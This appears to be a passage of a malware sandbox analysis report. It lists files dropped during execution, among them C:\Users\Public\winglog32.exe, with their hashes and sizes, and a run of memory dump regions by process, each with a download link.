96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bFQLYYir.exe

Filesize
5KB

MD5
f6515df66debd922c1d9699648bc06bd

SHA1
b4f7d322b28db243e2c05f140705daf7e187d1ca

SHA256
5c3eaf6874c3bbda22c734b4ae2738cd3f2ac5f43f38c3065567fa872396c796

SHA512
93f37508e5c0139c850bdabda0e6b8f961e668f14a73ba317f0b7424272a4f2c0cbd4ed36c50ca2c75d3ab15b13e70876d0c6cc7e15cc6af2c517786b40f99be

Download Submit
C:\Users\Public\winglog32.exe

Filesize
230KB

MD5
d89b39cb7fe0482dc007eb71babb409e

SHA1
6f5e9baca8991079754a39b532422ca6309f3b46

SHA256
4c5a7acef18ae77e11a794039e01e94129233c3e4afaec1ba8d3d0b1791a2b83

SHA512
5ecaede979961d8ceb55e98fb77464213ce6d72e77fafabd6c7a71f53d9c400cf43d6cfa20750c650370d66b396d0ed4ba1814e4ca895b205a2eaca52f648384

Download Submit
memory/264-12-0x00007FFFAEA50000-0x00007FFFAF511000-memory.dmp

Filesize
10.8MB

Download
memory/264-10-0x0000018FD2710000-0x0000018FD2732000-memory.dmp

Filesize
136KB

Download
memory/264-11-0x00007FFFAEA50000-0x00007FFFAF511000-memory.dmp

Filesize
10.8MB

Download
memory/264-0-0x00007FFFAEA53000-0x00007FFFAEA55000-memory.dmp

Filesize
8KB

Download
memory/264-14-0x00007FFFAEA50000-0x00007FFFAF511000-memory.dmp

Filesize
10.8MB

Download
memory/264-13-0x00007FFFAEA53000-0x00007FFFAEA55000-memory.dmp

Filesize
8KB

Download
memory/264-715-0x00007FFFAEA50000-0x00007FFFAF511000-memory.dmp

Filesize
10.8MB

Download
memory/264-15-0x0000018FEB740000-0x0000018FEB902000-memory.dmp

Filesize
1.8MB

Download
memory/316-161-0x0000023B86CA0000-0x0000023B86CCA000-memory.dmp

Filesize
168KB

Download
memory/316-166-0x0000023B86CA0000-0x0000023B86CCA000-memory.dmp

Filesize
168KB

Download
memory/316-167-0x00007FFF8CB10000-0x00007FFF8CB20000-memory.dmp

Filesize
64KB

Download
memory/324-943-0x000001753C3C0000-0x000001753C400000-memory.dmp

Filesize
256KB

Download
memory/384-171-0x000001CE4FF30000-0x000001CE4FF5A000-memory.dmp

Filesize
168KB

Download
memory/612-131-0x00000295B3B60000-0x00000295B3B85000-memory.dmp

Filesize
148KB

Download
memory/612-132-0x00000295B3B90000-0x00000295B3BBA000-memory.dmp

Filesize
168KB

Download
memory/612-138-0x00000295B3B90000-0x00000295B3BBA000-memory.dmp

Filesize
168KB

Download
memory/612-139-0x00007FFF8CB10000-0x00007FFF8CB20000-memory.dmp

Filesize
64KB

Download
memory/612-133-0x00000295B3B90000-0x00000295B3BBA000-memory.dmp

Filesize
168KB

Download
memory/672-149-0x00007FFF8CB10000-0x00007FFF8CB20000-memory.dmp

Filesize
64KB

Download
memory/672-148-0x0000024F77A80000-0x0000024F77AAA000-memory.dmp

Filesize
168KB

Download
memory/672-143-0x0000024F77A80000-0x0000024F77AAA000-memory.dmp

Filesize
168KB

Download
memory/732-179-0x000002004D160000-0x000002004D18A000-memory.dmp

Filesize
168KB

Download
memory/952-153-0x00000160BE320000-0x00000160BE34A000-memory.dmp

Filesize
168KB

Download
memory/1696-52-0x0000000000080000-0x000000000008E000-memory.dmp

Filesize
56KB

Download
memory/2188-117-0x00007FFFCC230000-0x00007FFFCC2EE000-memory.dmp

Filesize
760KB

Download
memory/2188-116-0x00007FFFCCA90000-0x00007FFFCCC85000-memory.dmp

Filesize
2.0MB

Download
memory/2188-115-0x00000193504E0000-0x000001935050A000-memory.dmp

Filesize
168KB

Download
memory/4960-126-0x00007FFFCCA90000-0x00007FFFCCC85000-memory.dmp

Filesize
2.0MB

Download
memory/4960-127-0x00007FFFCC230000-0x00007FFFCC2EE000-memory.dmp

Filesize
760KB

Download
memory/4960-125-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-118-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-120-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-121-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-119-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4960-128-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download